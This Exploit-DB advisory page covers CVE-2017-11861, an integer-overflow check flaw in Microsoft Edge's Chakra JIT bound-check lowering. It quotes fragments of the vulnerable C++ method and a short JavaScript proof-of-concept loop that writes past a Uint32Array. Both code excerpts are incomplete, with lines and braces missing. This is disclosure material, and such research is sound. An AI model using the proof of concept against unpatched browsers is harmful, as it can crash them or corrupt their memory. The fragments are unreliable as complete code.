Microsoft Edge Chakra: JIT - 'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check

EDB-ID: 43153
Author: Google Security Research
Published: 2017-11-16
CVE: CVE-2017-11861
Type: Dos
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: Integer Overflow
Vulnerable App: N/A


Here's a snippet of the method.
void Lowerer::LowerBoundCheck(IR::Instr *const instr)
IntConstType newOffset;
if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)
offset = newOffset;
rightOpnd = nullptr;
offsetOpnd = nullptr;
rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);

At (a), it uses "IntConstMath::Add" to check integer overflow. But the size of IntConstType equals to the size of pointer, and the "offset" variable is used as a 32-bit integer. So it may fail to check integer overflow on 64-bit system.


function f() {
let arr = new Uint32Array(0x1000);
for (let i = 0; i < 0x7fffffff;) {
arr[++i] = 0x1234;


Related Posts